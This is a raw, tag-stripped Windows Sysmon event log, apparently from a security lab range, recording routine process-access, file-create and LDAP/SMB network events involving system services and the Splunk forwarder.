11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16AC-6216-F304-000000003902}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.448{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16AC-6216-F304-000000003902}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:44.449{4F8D34B0-16AC-6216-F304-000000003902}2468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.933{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713534737B26BDF4BE8350266ACC2CA4,SHA256=9777E3900AC1250B541A53DF8DAD9B05BDF900CE2283BF668FDC15E172E322F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:45.589{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9235A8FB60C08FCB448AE5B935AD5079,SHA256=DCA5A795F10E579227EDE1B293483EBF40426E10AFC185D013F0EFEC6CD366F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.685{C8EA50B7-F11D-6215-0B00-000000003802}6286484C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.685{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.616{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000296732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.532{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.516{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:45.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A168A703AE39835CA859E96B0EFE06C9,SHA256=91BFE8F408CC2F967776FED2FB23A2581891A5F73C66F5C5DFC0766726B3A43F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:45.464{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84851D32502CB56F6DB6D8A53182BDF5,SHA256=69AFE2D91E1394947DCB7811A545A209A6F027AB05900B20AED4D94837CAD122,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:45.152{4F8D34B0-16AC-6216-F404-000000003902}20721936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:46.605{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8756D11DEEC834C9F93FFE9ABB2C0703,SHA256=0B8178347D501461DB87830B00533619AF7D32AB5F06CAABC4CCF42C048B82B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.095{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49378-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000296742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.095{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49378-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000296741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.018{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49377-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:45.018{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49377-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:44.995{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49376-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:44.995{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49376-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:46.631{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7B3AE2E638F25B8D17FD80818AE47A76,SHA256=77BB7A209656251697BA65402D41D79EC7D3F6466DF202A6744D810168FB7A31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:46.480{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.933{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BCD42BE7062AAD946AC519BD734E801,SHA256=A1F7BF730FF5FB828BE11359227FE71BB694637CDB28CA1C43256DF90D45C76A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:47.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E75B78F9767EC513AB7CCD48046A78D,SHA256=E3EB40FACE7B27214D5040E4F398811CA41D6FDA59BD7F95C54ED41FCFA24B60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16AF-6216-F604-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:47.683{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 